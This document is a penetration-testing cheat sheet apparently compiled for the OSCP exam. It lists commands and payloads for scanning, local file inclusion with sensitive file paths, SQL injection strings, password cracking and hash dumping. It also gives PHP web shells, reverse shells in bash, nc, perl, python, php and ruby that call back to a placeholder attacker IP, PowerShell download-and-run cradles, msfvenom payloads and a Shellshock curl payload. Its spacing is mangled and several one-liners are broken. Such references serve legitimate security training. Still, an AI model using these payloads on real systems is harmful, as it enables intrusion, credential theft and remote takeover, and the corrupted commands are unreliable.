Commands, Payloads and Resources for the Offensive Security Certified Professional Certification.
certutil - urlcache - split - f "http://<local_ip>/<file>" < file >
./chisel server - p 9002 - reverse - v
./chisel client < remote_ip > :9002 R :9003 :127.0 .0.1 :8888
gcc (-- static ) - m32 - Wl ,-- hash - style = both exploit .c - o exploit
i686 - w64 - mingw32 - gcc - o main32 .exe main .c
x86_64 - w64 - mingw32 - gcc - o main64 .exe main .c
nc - lnvp < local_port > < < file >
nc < remote_ip > < remote_port > > < file >
ping - c 1 < remote_ip >
ping - n 1 < remote_ip >
sudo python - m SimpleHTTPServer 80
sudo pyhton3 - m http .server 80
xfreerdp /v :< remote_ip > /u :< user > /p :< password > + clipboard
rdesktop < remote_ip >
ssh user @< remote_ip > - oKexAlgorithms = + diffie - hellman - group1 - sha1
ssh - R 8080 :< local_ip > :80 < remote_ip >
ssh - L 8000 :127.0 .0.1 :8000 < user > @< remote_ip >
ssh - N - L 1234 :127.0 .0.1 :1234 < user > @< remote_ip >
ssh - L 80 :< local_ip > :80 < remote_ip >
ssh - L 127.0 .0 .1 :80 :< local_ip > :80 < remote_ip >
ssh - L 80 :localhost :80 < remote_ip >
ctrl b + w # show windows
ctrl + " # split window horizontal
ctrl + % # split window vertical
ctrl + , # rename window
ctrl + { # flip window
ctrl + } # flip window
ctrl + spacebar # switch pane layout
Copy & Paste
1. ctrl b + [
2. space
3. alt w
4. ctrl b + ]
ctrl b + [ # enter copy
ctrl + / # enter search while within copy mode for vi mode
n # search next
shift + n # reverse search
python - c 'import pty;pty.spawn("/bin/bash")'
python3 - c 'import pty;pty.spawn("/bin/bash")'
ctrl + z
stty raw - echo
export XTERM = xterm
:w !sudo tee % # save file with elevated privileges without exiting
Windows Command Formatting
echo "<command>" | iconv - f UTF - 8 - t UTF - 16L E | base64 - w0
sudo nmap - A - T4 - p - - sS - sV - oN initial -- script discovery < remote_ip > # discovery scan
sudo nmap - A - T4 - sC - sV -- script vuln < remote_ip > # vulnerability scan
sudo nmap - sU < remote_ip > # udp scan
sudo nmap - sC - sV - p - -- scan - delay 5 s < remote_ip > # delayed scan
sudo nmap $TARGET - p 88 -- script krb5 - enum - users -- script - args krb5 - enum - users .realm = 'test' < remote_ip > # kerberos enumeration
ls - lh /usr /share /nmap /scripts /* ssh *
locate - r '\.nse$' | xargs grep categories | grep categories | grep 'default\|version\|safe' | grep smb
whois < domain >
host < remote_ip > < remote_ip >
host - l < domain > < remote_ip >
dig @< remote_ip > - x < domain >
dig {a |txt |ns |mx } < domain >
dig {a |txt |ns |mx } < domain > @ns1 .< domain >
dig axfr @< remote_ip > < domain > # zone transfer - needs tcp DNS - port 53
ldapsearch - x - w < password >
ldapsearch - x - h < remote_ip > - s base namingcontexts
ldapsearch - x - b "dc=<target_domain>,dc=local" "*" - h < remote_ip > | awk '/dn: / {print $2}'
ldapsearch - x - D "cn=admin,dc=<target_domain>,dc=local" - s sub "cn=*" - h < remote_ip > | awk '/uid: /{print $2}' | nl
ldapsearch - D "cn=admin,dc=acme,dc=com" "(objectClass=*)" - w ldapadmin - h ldap .acme .com
ldapsearch - x - h < remote_ip > - D "<user>" - b "dc=<target_domain>,dc=local" "(ms-MCS-AdmPwd=*)" ms - MCS - AdmPwd
sslyze -- heartbleed < remote_ip >
nbtscan < remote_ip >
enum4linux - a < remote_ip >
./finger - user - enum .pl - U /usr /share /seclists /Usernames /Names /names .txt - t < remote_ip >
./nuclei - target https ://<target_url> -t nuclei-templates # basic syntax with path to templates
./nuclei - target https ://<target_url> -t nuclei-templates -rate-limit 5 # rate limiting
./nuclei - target https ://<target_url> -t nuclei-templates -header 'User-Agent: Pentesting -H 'X-OSCP-EXAM: oscp_exam' # set headers
curl - s - k "" | grep - Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sed '/^\./d'
ffuf - w /usr /share /wordlists /dirb /common .txt - u http ://<target_url>/FUZZ -mc 200,204,301,302,307,401 -o results.txt
ffuf - c - w /usr /share /seclists /Discovery /DNS /subdomains - top1million - 110000. txt - u http ://<target_url>/ -H "Host: FUZZ.<target url>" -fs 185
ffuf - c - w /usr /share /wordlists /seclists /Fuzzing /4 - digits - 0000 - 9999. txt - u http ://<target_url>/backups/
ffuf - w /usr /share /wordlists /seclists /Fuzzing /LFI /LFI - Jhaddix .txt - u http ://<target_url>/admin../admin_staging/index.php?page=FUZZ -fs 15349
gobuster dir - w /usr /share /wordlists /dirbuster /directory - list - 2.3 - medium .txt - u http ://<remote_ip>/
gobuster dir - w /usr /share /seclists /Discovery /Web - Content /big .txt - u http ://<remote_ip> -x php
gobuster dir - w /usr /share /wordlists /dirb /big .txt - u http ://<remote_ip> -x php,txt,html,js -e -s 200
gobuster dir - w /usr /share /wordlists /seclists /Discovery /Web - Content /directory - list - lowercase - 2.3 - medium .txt - u https ://<remote_ip>:<remote_port>/ -b 200 -k --wildcard
gobuster dns - d < target_domain > - t 50 - w /usr /share /wordlists /seclists /Discovery /DNS /subdomains - top1million - 110000. txt
hakrawler - url < remote_ip > - depth 3
hakrawler - url < remote_ip > - depth 3 - plain
hakrawler - url < remote_ip > - depth 3 - plain | httpx - http - proxy http ://
Local File Inclusion Vulnerability
http ://<target_domain>/<file>.php?file=
http ://<target_domain>/<file>.php?file=../../../../../../../../etc/passwd
http ://<target_domain>/<file>/php?file=../../../../../../../../../../etc/passwd
http ://<target_domain>/<file>/php?file=../../../../../../../../../../etc/passwd%00
Encoded Traversal Strings
%2e %2e %2f
%252e %252e %252f
%c0 %ae %c0 %ae %c0 %af
%uff0e %uff0e %u2215
%uff0e %uff0e %u2216
http ://<remote_ip>/index.php?page=php://filter/convert.base64-encode/resource=index
base64 - d < file > .php
/etc /passwd
/etc /shadow
/etc /aliases
/etc /anacrontab
/etc /apache2 /apache2 .conf
/etc /apache2 /httpd .conf
/etc /apache2 /sites - enabled /000 - default .conf
/etc /at .allow
/etc /at .deny
/etc /bashrc
/etc /bootptab
/etc /chrootUsers
/etc /chttp .conf
/etc /cron .allow
/etc /cron .deny
/etc /crontab
/etc /cups /cupsd .conf
/etc /exports
/etc /fstab
/etc /ftpaccess
/etc /ftpchroot
/etc /ftphosts
/etc /groups
/etc /grub .conf
/etc /hosts
/etc /hosts .allow
/etc /hosts .deny
/etc /httpd /access .conf
/etc /httpd /conf /httpd .conf
/etc /httpd /httpd .conf
/etc /httpd /logs /access_log
/etc /httpd /logs /access .log
/etc /httpd /logs /error_log
/etc /httpd /logs /error .log
/etc /httpd /php .ini
/etc /httpd /srm .conf
/etc /inetd .conf
/etc /inittab
/etc /issue
/etc /lighttpd .conf
/etc /lilo .conf
/etc /logrotate .d /ftp
/etc /logrotate .d /proftpd
/etc /logrotate .d /vsftpd .log
/etc /lsb - release
/etc /motd
/etc /modules .conf
/etc /motd
/etc /mtab
/etc /my .cnf
/etc /my .conf
/etc /mysql /my .cnf
/etc /network /interfaces
/etc /networks
/etc /npasswd
/etc /passwd
/etc /php4 .4 /fcgi /php .ini
/etc /php4 /apache2 /php .ini
/etc /php4 /apache /php .ini
/etc /php4 /cgi /php .ini
/etc /php4 /apache2 /php .ini
/etc /php5 /apache2 /php .ini
/etc /php5 /apache /php .ini
/etc /php /apache2 /php .ini
/etc /php /apache /php .ini
/etc /php /cgi /php .ini
/etc /php .ini
/etc /php /php4 /php .ini
/etc /php /php .ini
/etc /printcap
/etc /profile
/etc /proftp .conf
/etc /proftpd /proftpd .conf
/etc /pure - ftpd .conf
/etc /pureftpd .passwd
/etc /pureftpd .pdb
/etc /pure - ftpd /pure - ftpd .conf
/etc /pure - ftpd /pure - ftpd .pdb
/etc /pure - ftpd /putreftpd .pdb
/etc /redhat - release
/etc /resolv .conf
/etc /samba /smb .conf
/etc /snmpd .conf
/etc /ssh /ssh_config
/etc /ssh /sshd_config
/etc /ssh /ssh_host_dsa_key
/etc /ssh /ssh_host_dsa_key .pub
/etc /ssh /ssh_host_key
/etc /ssh /ssh_host_key .pub
/etc /sysconfig /network
/etc /syslog .conf
/etc /termcap
/etc /vhcs2 /proftpd /proftpd .conf
/etc /vsftpd .chroot_list
/etc /vsftpd .conf
/etc /vsftpd /vsftpd .conf
/etc /wu - ftpd /ftpaccess
/etc /wu - ftpd /ftphosts
/etc /wu - ftpd /ftpusers
/logs /pure - ftpd .log
/logs /security_debug_log
/logs /security_log
/opt /lampp /etc /httpd .conf
/opt /xampp /etc /php .ini
/proc /cpuinfo
/proc /filesystems
/proc /interrupts
/proc /ioports
/proc /meminfo
/proc /modules
/proc /mounts
/proc /stat
/proc /swaps
/proc /version
/proc /self /net /arp
/proc /sched_debug
/proc /net /arp
/proc /net /tcp
/proc /net /udp
/root /anaconda - ks .cfg
/usr /etc /pure - ftpd .conf
/usr /lib /php .ini
/usr /lib /php /php .ini
/usr /local /apache /conf /modsec .conf
/usr /local /apache /conf /php .ini
/usr /local /apache /log
/usr /local /apache /logs
/usr /local /apache /logs /access_log
/usr /local /apache /logs /access .log
/usr /local /apache /audit_log
/usr /local /apache /error_log
/usr /local /apache /error .log
/usr /local /cpanel /logs
/usr /local /cpanel /logs /access_log
/usr /local /cpanel /logs /error_log
/usr /local /cpanel /logs /license_log
/usr /local /cpanel /logs /login_log
/usr /local /cpanel /logs /stats_log
/usr /local /etc /httpd /logs /access_log
/usr /local /etc /httpd /logs /error_log
/usr /local /etc /php .ini
/usr /local /etc /pure - ftpd .conf
/usr /local /etc /pureftpd .pdb
/usr /local /lib /php .ini
/usr /local /php4 /httpd .conf
/usr /local /php4 /httpd .conf .php
/usr /local /php4 /lib /php .ini
/usr /local /php5 /httpd .conf
/usr /local /php5 /httpd .conf .php
/usr /local /php5 /lib /php .ini
/usr /local /php /httpd .conf
/usr /local /php /httpd .conf .ini
/usr /local /php /lib /php .ini
/usr /local /pureftpd /etc /pure - ftpd .conf
/usr /local /pureftpd /etc /pureftpd .pdn
/usr /local /pureftpd /sbin /pure - config .pl
/usr /local /www /logs /httpd_log
/usr /local /Zend /etc /php .ini
/usr /sbin /pure - config .pl
/var /adm /log /xferlog
/var /apache2 /config .inc
/var /apache /logs /access_log
/var /apache /logs /error_log
/var /cpanel /cpanel .config
/var /lib /mysql /my .cnf
/var /lib /mysql /mysql /user .MYD
/var /local /www /conf /php .ini
/var /log /apache2 /access_log
/var /log /apache2 /access .log
/var /log /apache2 /error_log
/var /log /apache2 /error .log
/var /log /apache /access_log
/var /log /apache /access .log
/var /log /apache /error_log
/var /log /apache /error .log
/var /log /apache - ssl /access .log
/var /log /apache - ssl /error .log
/var /log /auth .log
/var /log /boot
/var /htmp
/var /log /chttp .log
/var /log /cups /error .log
/var /log /daemon .log
/var /log /debug
/var /log /dmesg
/var /log /dpkg .log
/var /log /exim_mainlog
/var /log /exim /mainlog
/var /log /exim_paniclog
/var /log /exim .paniclog
/var /log /exim_rejectlog
/var /log /exim /rejectlog
/var /log /faillog
/var /log /ftplog
/var /log /ftp - proxy
/var /log /ftp - proxy /ftp - proxy .log
/var /log /httpd - access .log
/var /log /httpd /access_log
/var /log /httpd /access .log
/var /log /httpd /error_log
/var /log /httpd /error .log
/var /log /httpsd /ssl .access_log
/var /log /httpsd /ssl_log
/var /log /kern .log
/var /log /lastlog
/var /log /lighttpd /access .log
/var /log /lighttpd /error .log
/var /log /lighttpd /lighttpd .access .log
/var /log /lighttpd /lighttpd .error .log
/var /log /mail .info
/var /log /mail .log
/var /log /maillog
/var /log /mail .warn
/var /log /message
/var /log /messages
/var /log /mysqlderror .log
/var /log /mysql .log
/var /log /mysql /mysql - bin .log
/var /log /mysql /mysql .log
/var /log /mysql /mysql - slow .log
/var /log /proftpd
/var /log /pureftpd .log
/var /log /pure - ftpd /pure - ftpd .log
/var /log /secure
/var /log /vsftpd .log
/var /log /wtmp
/var /log /xferlog
/var /log /yum .log
/var /mysql .log
/var /run /utmp
/var /spool /cron /crontabs /root
/var /webmin /miniserv .log
/var /www /< vhost > /__init__ .py
/var /www /log /access_log
/var /www /log /error_log
/var /www /logs /access_log
/var /www /logs /error_log
/var /www /logs /access .log
/var /www /logs /error .log
~/.ssh /authorized_keys
~/.ssh /id_dsa
~/.ssh /id_dsa .pub
~/.ssh /id_rsa
~/.ssh /id_rsa .pub
~/.ssh /identity
~/.ssh /identity .pub
C :/Users /Administrator /NTUser .dat
C :/Documents and Settings /Administrator /NTUser .dat
C :/apache /logs /access .log
C :/apache /logs /error .log
C :/apache /php /php .ini
C :/boot .ini
C :/inetpub /wwwroot /global .asa
C :/MySQL /data /hostname .err
C :/MySQL /data /mysql .err
C :/MySQL /data /mysql .log
C :/MySQL /my .cnf
C :/MySQL /my .ini
C :/php4 /php .ini
C :/php5 /php .ini
C :/php /php .ini
C :/Program Files /Apache Group /Apache2 /conf /httpd .conf
C :/Program Files /Apache Group /Apache /conf /httpd .conf
C :/Program Files /Apache Group /Apache /logs /access .log
C :/Program Files /Apache Group /Apache /logs /error .log
C :/Program Files /FileZilla Server /FileZilla Server .xml
C :/Program Files /MySQL /data /hostname .err
C :/Program Files /MySQL /data /mysql - bin .log
C :/Program Files /MySQL /data /mysql .err
C :/Program Files /MySQL /data /mysql .log
C :/Program Files /MySQL /my .ini
C :/Program Files /MySQL /my .cnf
C :/Program Files /MySQL /MySQL Server 5.0 /data /hostname .err
C :/Program Files /MySQL /MySQL Server 5.0 /data /mysql - bin .log
C :/Program Files /MySQL /MySQL Server 5.0 /data /mysql .err
C :/Program Files /MySQL /MySQL Server 5.0 /data /mysql .log
C :/Program Files /MySQL /MySQL Server 5.0 /my .cnf
C :/Program Files /MySQL /MySQL Server 5.0 /my .ini
C :/Program Files (x86 )/Apache Group /Apache2 /conf /httpd .conf
C :/Program Files (x86 )/Apache Group /Apache /conf /httpd .conf
C :/Program Files (x86 )/Apache Group /Apache /conf /access .log
C :/Program Files (x86 )/Apache Group /Apache /conf /error .log
C :/Program Files (x86 )/FileZilla Server /FileZilla Server .xml
C :/Program Files (x86 )/xampp /apache /conf /httpd .conf
C :/WINDOWS /php .ini
C :/WINDOWS /Repair /SAM
C :/Windows /repair /system
C :/Windows /repair /software
C :/Windows /repair /security
C :/WINDOWS /System32 /drivers /etc /hosts
C :/Windows /win .ini
C :/WINNT /php .ini
C :/WINNT /win .ini
C :/xampp /apache /bin /php .ini
C :/xampp /apache /logs /access .log
C :/xampp /apache /logs /error .log
C :/Windows /Panther /Unattend /Unattended .xml
C :/Windows /Panther /Unattended .xml
C :/Windows /debug /NetSetup .log
C :/Windows /system32 /config /AppEvent .Evt
C :/Windows /system32 /config /SecEvent .Evt
C :/Windows /system32 /config /default .sav
C :/Windows /system32 /config /security .sav
C :/Windows /system32 /config /software .sav
C :/Windows /system32 /config /system .sav
C :/Windows /system32 /config /regback /default
C :/Windows /system32 /config /regback /sam
C :/Windows /system32 /config /regback /security
C :/Windows /system32 /config /regback /system
C :/Windows /system32 /config /regback /software
C :/Program Files /MySQL /MySQL Server 5.1 /my .ini
C :/Windows /System32 /inetsrv /config /schema /ASPNET_schema .xml
C :/Windows /System32 /inetsrv /config /applicationHost .config
C :/inetpub /logs /LogFiles /W3SVC1 /u_ex [YYMMDD ].log
wfuzz - w /usr /share /wfuzz /wordlist /general /big .txt - u http ://<remote_ip>:<remote_port>/FUZZ/<file>.php --hc '403,404'
wfuzz - w /usr /share /wordlists /seclists /Discovery /Web - Content /big .txt - u http ://<remote_ip:/<directory>/FUZZ.FUZ2Z -z list,txt-php --hc 403,404 -c
wfuzz - w /usr /share /wordlists /seclists /Discovery /DNS /subdomains - top1million - 110000. txt - H "Host: FUZZ.<target_url>" -- hc 200 -- hw 356 - t 100 < remote_ip >
wfuzz - X POST - u "http://<remote_ip>:<remote_port>/login.php" - d "email=FUZZ&password=<password>" - w /path /to /wordlist .txt -- hc 200 - c
wfuzz - c - z file ,/usr /share /wordlists /seclists /Fuzzing /SQLi /Generic - SQLi .txt - d 'db=FUZZ' -- hl 16 http ://<remote_ip>/select
wfuzz - c - w /usr /share /wordlists /secLists /Discovery /DNS /subdomains - top1million - 110000. txt -- hc 400 ,403 ,404 - H "Host: FUZZ.<target_domain>" - u http ://<target_domain> --hw <value> -t 100
wfuzz - w /usr /share /wordlists /seclists /Fuzzing /4 - digits - 0000 - 9999. txt -- hw 31 http ://
wpscan -- url https ://<remote_ip> --disable-tls-checks
wpscan -- url https ://<remote_ip> --disable-tls-checks --enumerate u
target = < remote_ip > ; wpscan -- url http ://$target:80 --enumerate u,t,p | tee $target-wpscan-enum
wpscan -- url http ://<remote_ip> -U <user> -P passwords.txt -t 50
java - jar ysoserial - master - SNAPSHOT .jar
java - jar ysoserial - master - SNAPSHOT .jar CommonsCollections1 'nc <local_ip> <local_port> -e /bin/sh' | base64 - w 0
java - jar ysoserial .jar Groovy1 calc .exe > groovypayload .bin
java - jar ysoserial - master - 6eca5bc740 - 1. jar CommonsCollections4 "$jex" > /tmp /$filename .session
show databases ;
use < db > ;
show tables ;
mysql - u < user > - h < host > - p
' or ' 1 '=' 1
admin ' or ' 1 '=' 1
- '
' '
' or ' '-'
' or ' ' '
' or ' '&'
' or ' '^'
' or ' '*'
" "
" or " "-"
" or " " "
" or " "&"
" or " "^"
" or " "*"
or true --
" or true--
' or true--
") or true--
' ) or true--
' or ' x '=' x
') or (' x ')=(' x
')) or ((' x '))=((' x
" or " x "=" x
") or (" x ")=(" x
")) or ((" x "))=((" x
-- batch # don 't ask any questions
-- current - db # dumps database
sqlmap -- list - tampers
sqlmap - r < file > .reg - p id
sqlmap - r < file > .reg - p id -- dump
sqlmap - r < file > .reg -- level 5 -- risk 3 -- threads 10
sqlmap - r < file > .reg -- level 5 -- risk 3 -- tables
sqlmap - r < file > .reg -- level 5 -- risk 3 -- tables users -- dump -- threads 10
sqlmap - r < file > .reg - p id -- passwords
sqlmap - r < file > .reg - p id -- read - file + /etc /passwd
sqlmap - R < file > .reg - p id -- os - cmd = whoami
sqlmap - u 'http://<remote_ip>/dashboard.php?search=a' --cookie="PHPSESSID=c35v0sipg7q8cnpiqpeqj42hhq"
sqlmap - u 'http://<remote_ip>/dashboard.php?search=a' --cookie="PHPSESSID=c35v0sipg7q8cnpiqpeqj42hhq" --os-shell
sqsh - S < remote_ip > - U < user >
'admin@<FQDN>' = 'admin@<FQDN>++++++++++++++++++++++++++++++++++++++htb'
test ' or 1=1 or ' a '=' a
test ' or 1=2 or ' a '=' a
'or substring(Password,1,1)=' p ' or' # checking letter "p" on the beginning of the password
'or substring(Password,2,1)=' p ' or' # checking letter "p" on the second position of the password
fcrackzip - u - D - p /usr /share /wordlists /rockyou .txt < file > .zip
export HYDRA_PROXY = connect ://
hydra < remote_ip > http - form - post "/otrs/^PASS^:Login failed" - l root @localhost - P otrs - cewl .txt - vV - f
hydra - l admin - P /usr /share /wordlists /rockyou .txt < remote_ip > http - post - form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=COOKIE_1&__EVENTVALIDATION=COOKIE_2&UserName=^USER^&Password=^PASS^&LoginButton=Log+in:Login failed"
/usr /share /john /ssh2john .py id_rsa > hash
john hash -- wordlist = /usr /share /wordlists /rockyou .txt < file >
john -- rules -- wordlist = /usr /share /wordlists /rockyou .txt < file >
john -- show < file >
psexec .py < user > @< remote_ip >
sudo impacket - smbserver local . - smb2support
rpcdump .py < target_domain > /< user > :< password /hash > @< remote_ip >
smbclient .py < target_domain > /< user > :< password /hash > @< remote_ip >
lookupsid .py < target_domain > /< user > :< password /hash > @< remote_ip >
reg .py < target_domain > /< user > :[password :password hash ]@< remote_ip > < action > < action >
mssqlclient .py < user > @< remote_ip >
mssqlclient .py < user > @< remote_ip > - windows - auth
getST .py intelligence .htb /svc_int$ - spn WWW /dc .intelligence .htb - hashes :d64b83fe606e6d3005e20ce0ee932fe2 - impersonate Administrator
GetNPUsers .py < target_domain > .local / - usersfile usernames .txt - format hashcat - outputfile hashes .asreproast
getTGT .py < domain > .local /< user > - dc - ip < domain > .local - hashes aad3b435b51404eeaad3b435b51404ee :7 c662956a4a0486a80fbb2403c5a9c2c
secretsdump .py < domain > /< user > @< remote_ip >
secretsdump .py - ntds ndts .dit - system system - hashes lmhash :nthash LOCAL - output nt - hash
/usr /share /webshells
< ?php echo shell_exe (($_GET ['cmd' ]); ?>
< ?php echo "test" ;?>
< ?php system ($_GET ['cmd' ]);?>
< ?php file_put_contents ($_GET ['upload' ], file_get_contents ("http://<local_ip>:<local_port>/" . $_GET ['upload' ]); ?>
< ?php if (isset ($_GET ['upload' ])) {file_put_contents ($_GET ['upload' ], file_get_contents ("http://<local_ip>:<local_port>/" . $_GET ['upload' ])); }; if (isset ($_GET ['cmd' ])) { system ($_GET ['cmd' ]); };?>
Bypass List (Windows 10 Build 1803):
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10)
powershell - c "$SecPass = Convertto-securestring 'Welcome1!' -AsPlainText -Force;$cred=New-Object System.Management.Automation.PScredential('administrator', $SecPass);Start-Process -FilePath 'C:\Users \Public \Downloads \nc .exe ' -argumentlist ' - e cmd < local_ip > < local_port > ' -Credential $cred"
Bash Privilege Escalation
sudo - l
uname - a
cat /etc /hosts
cat /etc /fstab
cat /etc /passwd
ss - tulpn
ps - auxf
ls - lahv
ls - R /home
Basic Windows Enumeration
whoami /all
net users
net users < user >
sudo ruby /usr /local /bin /evil - winrm - i < remote_ip > - u < user > - p < password >
find . / - type f - exec grep -- color = always - i - I 'password' {} \;
find / - group < group > 2 > /dev /null
find / - user < user > 2 > /dev /null
find / - user < user > - ls 2 > /dev /null
find / - user < user > 2 > /dev /null | grep - v proc 2 > /dev /null
find / - user < user > - ls 2 > /dev /null | grep - v proc 2 > /dev /null
find / - perm - 4000 2 > /dev /null
find / - perm - 4000 2 > /dev /null | xargs ls - la
find / - type f - user root - perm - 4000 2 > /dev /null
grep - R db_passwd
grep - roiE "password.{20}"
grep - oiE "password.{20}" /etc /* .conf
IEX (New - Object Net .webclient ).downloadString ('http://<local_ip>:<local_port>/jaws-enum.ps1')
msfvenom - p windows /meterpreter /reverse_tcp LHOST = < local_ip > LPORT = < local_port > - b "\x00\x0a" - a x86 -- platform windows - f exe - o exploit .exe
msf6 > use exploit /multi /handler
msf6 exploit (multi /handler ) > set payload windows /meterpreter /reverse_tcp
msf6 exploit (multi /handler ) > set LHOST < local_ip >
msf6 exploit (multi /handler ) > set LPORT < local_ip >
msf6 exploit (multi /handler ) > run
.\exploit .exe
cd path /to /nishang /Shells /
cp Invoke - PowerShellTcp .ps1 Invoke - PowerShellTcp .ps1
tail - 3 Invoke - PowerShellTcp .ps1
Invoke - PowerShellTcp - Reverse - IPAddress < local_ip > - Port < local_port >
powershell "IEX(New-Object Net.Webclient).downloadString('http://<local_ip>:<local_port>/Invoke-PowerShellTcp.ps1')"
Set - ExecutionPolicy Unrestricted
powershell - Command "$PSVersionTable.PSVersion" # check powershell version
powershell - c "[Environment]::Is64BitProcess" # check for 64b it powershell
cmd /c powershell - nop - exec bypass - c "iex(new-object net.webclient).downloadstring('http://<local_ip>:<local_port>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <local_ip> -Port <local_port>"
powershell - c "(new-object System.Net.WebClient).DownloadFile(\"http://<local_ip>:<local_port>/nc.exe\",\"C:\Users \Public \Downloads \nc .exe \" )"
powershell (New - Object System .Net .WebClient ).UploadFile ('http://<local_ip>/upload.php', '<file>')
powershell - c "Invoke-Webrequest -Uri \"http://<local_ip>:<local_port>/shell.exe\" -OutFile \"C:\Users \Public \Downloads \shell .exe \" "
< remote_ip > /node /3 ?cmd = powershell - c IEX (New - object System .net .webclient ).DownloadString ('http://<local_ip>:<local:port>/Sherlock.ps1');Find-AllVulns
echo "IEX (New-object'http://<local_ip>:<local_port>/shell.ps1')" | powershell - noprofile -
curl - H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/<local_ip>/<local_port> 0>&1' http ://<remote_ip>/cgi-bin/
msfvenom - p windows /shell_reverse_tcp LHOST = < local_ip > LPORT = < local_port > - f c - a x86 -- platform windows - b "\x00\x0a\x0d" - e x86 /shikata_ga_nai
msfvenom - a x86 -- platform windows - p windows /shell /reverse_tcp LHOST = < local_ip > LPORT = < local_port > - b "\x00" - e x86 /shikata_ga_nai - f exe - o /tmp /shell .exe
tasklist /SVC
netsh firewall show state
schtasks /query /fo LIST /v
driverquery .exe /v /fo csv | ConvertFrom - CSV | Select - Object 'Display Name' , 'Start Mode' , Path
sc query
sc qc < service - name >
accesschk .exe - uws "Everyone" "C:\Program Files"
dir /s * pass * = = * cred * = = * vnc * = = * .config *
findstr /si password * .xml * .ini * .txt
wmic qfe get Caption ,Description ,HotFixID ,InstalledOn # no new patches - KEXP pretty likely
Writeable Directories in Linux
bash - i > & /dev /tcp /< local_ip > /< local_port > 0 > & 1
bash - c 'bash -i >& /dev/tcp/<local_ip>/<local_port> 0>&1'
http ://<target_url>');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <local_ip> <local_port>/tmp/f")-- # lua
nc - e /bin /sh < local_ip > < local_port >
rm /tmp /f ;mkfifo /tmp /f ;cat /tmp /f |/bin /sh - i 2 > & 1 |nc < local_ip > < local_port > > /tmp /f
perl - e 'use Socket;$i="<local_ip>";$p=<local_port>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
php - r '$sock=fsockopen("<local_ip>",<local_port>);exec("/bin/sh -i <&3 >&3 2>&3");'
python - c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<local_ip>",<local_port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'
python3 - c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<local_ip>",<local_port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'
ruby - rsocket - e '"<local_ip>",<local_port>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
< ?xml version = "1.0" encoding = "UTF-8" ?>
< configuration >
< system .webServer >
< handlers accessPolicy = "Read, Script, Write" >
< add name = "web_config" path = "*.config" verb = "*" modules = "IsapiModule" scriptProcessor = "%windir%\system32\inetsrv\asp.dll" resourceType = "Unspecified" requireAccess = "Write" preCondition = "bitness64" />
< /handlers >
< security >
< requestFiltering >
< fileExtensions >
< remove fileExtension = ".config" />
< /fileExtensions >
< hiddenSegments >
< remove segment = "web.config" />
< /hiddenSegments >
< /requestFiltering >
< /security >
< /system .webServer >
< /configuration >
< !-- ASP code comes here ! It should not include HTML comment closing tag and double dashes !
< %
Set s = CreateObject ("WScript.Shell" )
Set cmd = s .Exec ("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('')" )
o = cmd .StdOut .Readall ()
Response .write (o )
-- >
- hosts : localhost
tasks :
- name : badyml
command : chmod + s /bin /bash
Exploit Skeleton Python Script
#!/usr /bin /python
import socket ,sys
address = ''
port = 9999
buffer = #TBD
try :
print '[+] Sending buffer'
s = socket .socket (socket .AF_INET , socket .SOCK_STREAM )
s .connect ((address ,port ))
s .recv (1024 )
s .send (buffer + '\r\n' )
except :
print '[!] Unable to connect to the application.'
sys .exit (0 )
finally :
s .close ()
POST /< path > HTTP /1.1
Host : < remote_ip >
User - Agent : Mozilla /5.0 (X11 ; Linux x86_64 ; rv :78.0 ) Gecko /20100101 Firefox /78.0
Accept : * /*
Accept - Language : en - US ,en ;q = 0.5
Content - Type : application /json
Content - Length : 95
Connection : close
"auth" :{
"name" :"< user > ",
" password ":" < password > "
" filename ":" < file > "